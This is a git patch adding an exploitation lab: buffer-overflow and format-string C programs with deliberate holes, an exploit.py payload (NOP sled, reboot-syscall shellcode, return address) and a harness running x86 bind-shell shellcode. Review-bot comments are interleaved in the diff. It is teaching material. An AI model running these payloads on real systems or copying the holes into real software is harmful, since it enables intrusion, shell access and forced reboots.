From 7a13228c69249393c5a379f65e3ab66b11d2acc4 Mon Sep 17 00:00:00 2001
From: Florian Hoss
Date: Mon, 25 Apr 2022 09:07:50 +0200
Subject: [PATCH] include lab code
---
 Lab02/LabExploitation/bufferOverflow.c | 71 +++++++++++++++++++++
 Lab02/LabExploitation/bufferOverflowShell.c | 13 ++++
 Lab02/LabExploitation/exploit.py | 3 +
 Lab02/LabExploitation/formatString.c | 39 +++++++++++
 Lab02/LabExploitation/test-shellcode.c | 20 ++++++
 5 files changed, 146 insertions(+)
 create mode 100755 Lab02/LabExploitation/bufferOverflow.c
 create mode 100755 Lab02/LabExploitation/bufferOverflowShell.c
 create mode 100755 Lab02/LabExploitation/exploit.py
 create mode 100755 Lab02/LabExploitation/formatString.c
 create mode 100755 Lab02/LabExploitation/test-shellcode.c
diff --git a/Lab02/LabExploitation/bufferOverflow.c b/Lab02/LabExploitation/bufferOverflow.c
new file mode 100755
index 0000000..eb20d29
--- /dev/null
+++ b/Lab02/LabExploitation/bufferOverflow.c
@@ -0,0 +1,71 @@
+#include
+#include
+#include
+#include
+
+int counter = 0;
+char username[16];
+
+void win() {
+ printf("You win this round %s\n", username);
+ counter++;
+}
+
+void loose() {
+ printf("You lose, better luck next time %s!\n\n", username);
+ counter = 0;
+}
+
+
+int calculate(char *text, int input1, int input2, int input3, int number1, int number2, int number3){
+
+ char name[16];
+ strcpy(name, text);
+
+ if (number1 == input1 && number2 == input2 && number3 == input3)
+ return 0;
+ else
+ return 1;
+
+}
+
+int main(int argc, char ** argv) {
+
+ int number1, number2, number3;
+ int input1 = 0, input2 = 0, input3 = 0;
+
+
+ printf("Please enter your name!\n");
+ fgets(username, sizeof(username), stdin);
+
+
+ while(counter<5){
+ printf("Can you beat this minigame?\n\nEnter three numbers between 0-10 if you guess all correct you win, otherwise you lose!\n");
+
+ printf("Enter your first guess!\n");
+ scanf("%d", &input1, sizeof(number1));
+ printf("Enter your second guess!\n");
+ scanf("%d", &input2, sizeof(number2));
+ printf("Enter your third guess!\n");
+ scanf("%d", &input3, sizeof(number3));
+
+ srand((unsigned int)time);
+
+ number1 = rand() % 10;
+ number2 = rand() % 10;
+ number3 = rand() % 10;
+
+
+ if(calculate(argv[1], input1, input2, input3, number1, number2, number3)==0)
+ win();
+ else{
+ loose();
+ }
+
+ }
+
+ printf("Against all odds you beat the game!\nCongratulation %s", username);
+
+ exit(0);
+ return 0;
+}
diff --git a/Lab02/LabExploitation/bufferOverflowShell.c b/Lab02/LabExploitation/bufferOverflowShell.c
new file mode 100755
index 0000000..47441ee
--- /dev/null
+++ b/Lab02/LabExploitation/bufferOverflowShell.c
@@ -0,0 +1,13 @@
+#include
+#include
+
+int doSomething(char* input){
+ char buf[512];
+ strcpy(buf, input);
+ printf("Copied the following input to the buffer:\n %s\n", buf);
+}
+
+int main(int argc, char *argv[]){
+ doSomething(argv[1]);
+ return 0;
+}
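Review bot: `srand((unsigned int)time);` in main seeds the generator with the address of the `time` function rather than the current time, so the three "random" numbers are likely fixed for a given build instead of varying per run; formatString.c in this same commit spells it `srand (time(NULL))`, which presumably was the intent here too, and the fix is `srand((unsigned int)time(NULL));`. The three `scanf("%d", &inputN, sizeof(numberN))` calls pass a third argument that the `%d` conversion never reads, and their results are unchecked, so non-numeric input leaves the guess at its old value and the while loop keeps repeating the prompts without consuming the bad input; `if (scanf("%d", &input1) != 1) return 1;` (and likewise for the other two) makes the minigame itself well-defined. `argv[1]` is also handed to calculate without an argc check, so running the binary with no argument crashes in strcpy before the exercise starts. The unbounded `strcpy(name, text)` in calculate is the deliberate defect this lab is built around and must stay as is, but deserves a marker such as `/* intentionally unbounded copy from argv[1]: the overflow this lab studies */` so it is not mistaken for the bugs above or copied into non-lab code.
```c
int main(int argc, char ** argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <text>\n", argv[0]);
        return 1;
    }
    // … unchanged: declarations, name prompt, loop banner …
    printf("Enter your first guess!\n");
    if (scanf("%d", &input1) != 1) return 1;
    printf("Enter your second guess!\n");
    if (scanf("%d", &input2) != 1) return 1;
    printf("Enter your third guess!\n");
    if (scanf("%d", &input3) != 1) return 1;

    srand((unsigned int)time(NULL));  // seed from the clock, not from the address of time()
    // … unchanged: rand() draws, calculate()/win()/loose(), closing message …
```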
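Review bot: `int doSomething(char* input)` never returns a value, so control reaches its closing brace with no return; main ignores the result so nothing reads the indeterminate value, but `-Wreturn-type` flags it and `void doSomething(char *input)` states what the function actually does. main also passes `argv[1]` straight through without checking argc, so invoking the program with no argument hands NULL to strcpy and crashes before the lab's input path is reached; `if (argc < 2) return 1;` ahead of the call is enough. The unbounded `strcpy(buf, input)` is the exercise's intentional sink and should stay, marked with `/* intentionally unbounded: the lab's overflow target */` so a reader does not take it for an oversight.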
diff --git a/Lab02/LabExploitation/exploit.py b/Lab02/LabExploitation/exploit.py
new file mode 100755
index 0000000..7002234
--- /dev/null
+++ b/Lab02/LabExploitation/exploit.py
@@ -0,0 +1,3 @@
+import struct
+
+print("\x90"*238 +'\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80'+ '\xc0\xf4\xff\xbf'*5)
diff --git a/Lab02/LabExploitation/formatString.c b/Lab02/LabExploitation/formatString.c
new file mode 100755
index 0000000..3abdba2
--- /dev/null
+++ b/Lab02/LabExploitation/formatString.c
@@ -0,0 +1,39 @@
+#include
+#include
+#include
+
+
+int main() {
+
+ srand (time(NULL));
+
+ char firstName [32];
+ unsigned int userInput = 0;
+ unsigned int key = random() %65536;
+
+ char lastName[16];
+
+ printf("Please enter your first name!\n");
+ fgets(firstName, sizeof(firstName), stdin);
+
+ printf("Please enter your last name!\n");
+ fgets(lastName, sizeof(lastName), stdin);
+
+ printf("Your name is:");
+ printf(lastName);
+ printf("\n");
+
+
+ printf("Try to guess the secret number %s\n", &firstName);
+
+ scanf("%d", &userInput);
+ printf("%d\n", userInput);
+
+ if(userInput==key)
+ printf("Format String exploitation is really cool %s\n", &firstName);
+ else
+ printf("Try again!\n");
+
+ return 0;
+
+}
diff --git a/Lab02/LabExploitation/test-shellcode.c b/Lab02/LabExploitation/test-shellcode.c
new file mode 100755
index 0000000..6500f87
--- /dev/null
+++ b/Lab02/LabExploitation/test-shellcode.c
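Review bot: `printf("Try to guess the secret number %s\n", &firstName)` and the matching line in the success branch pass `&firstName`, a `char (*)[32]`, where `%s` expects a `char *`; both pointers hold the same address so it prints correctly by accident, but it is a format/argument mismatch that `-Wformat` reports, and plain `firstName` is the correct spelling. `scanf("%d", &userInput)` reads into an `unsigned int` through a signed conversion and `printf("%d\n", userInput)` prints it the same way; `%u` in both places matches the declared type. `key` is drawn with `random()` after seeding with `srand`; on glibc those share one generator, but that is not guaranteed elsewhere, so `rand() % 65536` keeps the seed and the draw on the same generator. The unchecked `printf(lastName)` is the format-string sink this lab is about and must stay, ideally tagged `/* intentionally passes user input as the format string: the lab's target */` so it is not read as an oversight.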
@@ -0,0 +1,20 @@
+#include
+#include
+
+// Enter your shellcode here
+char *code = \
+"\x31\xc0\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0\x66"
+"\xcd\x80\x89\xc6\x52\x66\x68\xaa\xaa\x66\x6a\x02\x89\xe1\x6a\x10"
+"\x51\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04"
+"\xb0\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
+"\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x52\x68\x2f"
+"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x52\x89\xe1\xb0\x0b"
+"\xcd\x80\x31\xc0\xb0\x01\xb3\x08\xcd\x80";
+
+// Just execute the shellcode. This is just to check if your shellcode works
+int main(int argc,char** argv ){
+ printf("Shellcode Length: %lu\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
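Review bot: `printf("Shellcode Length: %lu\n", strlen(code))` formats a `size_t` with `%lu`, which only matches on platforms where `size_t` is `unsigned long`; `%zu` is the portable conversion. `int (*ret)() = (int(*)())code;` declares the pointer with empty parentheses, the old unprototyped form; `int (*ret)(void) = (int (*)(void))code;` means the same thing in every C standard. argc and argv are unused and `int main(void)` would say so. The comment above main could also state that the harness casts `code` to a function pointer and calls it directly, so whatever happens after `ret()` — including whether main's end is ever reached — depends entirely on the payload, which tells a reader what a "working" run is expected to look like.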